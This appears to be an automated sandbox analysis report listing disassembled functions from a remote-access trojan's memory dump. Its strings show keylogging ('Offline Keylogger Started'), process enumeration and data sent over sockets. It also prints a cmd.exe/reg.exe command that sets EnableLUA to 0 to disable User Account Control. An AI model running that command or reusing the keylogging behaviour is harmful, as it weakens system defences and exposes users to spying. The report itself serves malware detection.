Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
Opcode Fuzzy Hash: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D

Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
wsprintfW.USER32 ref: 0040A905

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A88D
Offline Keylogger Started, xrefs: 0040A87D
], xrefs: 0040A892

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
Opcode Fuzzy Hash: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8

Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

Strings

`AG, xrefs: 00409DC2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: `AG
API String ID: 1958988193-3058481221
Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041CA7C
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
GetLastError.KERNEL32 ref: 0041CAA1

Strings

0, xrefs: 0041CA3D
MsgWindowClass, xrefs: 0041CA38

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4

Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
CloseHandle.KERNEL32(?), ref: 00406A0F
CloseHandle.KERNEL32(?), ref: 00406A14

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
C:\Windows\System32\cmd.exe, xrefs: 004069FB

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8

Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F

Strings

mscoree.dll, xrefs: 00442602
CorExitProcess, xrefs: 00442614

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C

Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8

Strings

pth_unenc, xrefs: 00412778
BG, xrefs: 00412779, 004127AA, 0041277C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc$BG
API String ID: 1818849710-2233081382
Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

KeepAlive | Disabled, xrefs: 00404AC6

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A

Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79

Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
GetProcAddress.KERNEL32(00000000), ref: 00401441

Strings

`#v, xrefs: 0040143A
GetCursorInfo, xrefs: 00401430
User32.dll, xrefs: 00401435

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll$`#v
API String ID: 1646373207-1032071883
Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E

Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9

Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF

GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
String ID:
API String ID: 3525466593-0
Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99

Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
CloseHandle.KERNEL32(00000000), ref: 0040E8AB

Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC

Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A

Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044311A
_free.LIBCMT ref: 0044313A

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84

Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
__alloca_probe_16.LIBCMT ref: 0044FF68
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
__freea.LIBCMT ref: 0044FFD4

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8

Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044E154
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
_free.LIBCMT ref: 0044E1B0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9

Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
_free.LIBCMT ref: 00446F8D
_free.LIBCMT ref: 00446FB4
SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F

Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F7C5

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 0044F7D7
_free.LIBCMT ref: 0044F7E9
_free.LIBCMT ref: 0044F7FB
_free.LIBCMT ref: 0044F80D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C

Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443315

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 00443327
_free.LIBCMT ref: 0044333A
_free.LIBCMT ref: 0044334B
_free.LIBCMT ref: 0044335C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E

Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 00416768
GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
IsWindowVisible.USER32(?), ref: 004167A1

Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8

Strings

(FG, xrefs: 0041692A

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ProcessWindow$Open$TextThreadVisible
String ID: (FG
API String ID: 3142014140-2273637114
Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A

Function 0044D469 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044D4B8
_free.LIBCMT ref: 0044D5D5

Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F

Strings

., xrefs: 0044D78C
*?, xrefs: 0044D4AC

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54

Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409601

Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5

Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

`AG, xrefs: 00409676
XCG, xrefs: 0040962C
>G, xrefs: 00409657

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsendsocket
String ID: XCG$`AG$>G
API String ID: 2334542088-2372832151
Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E

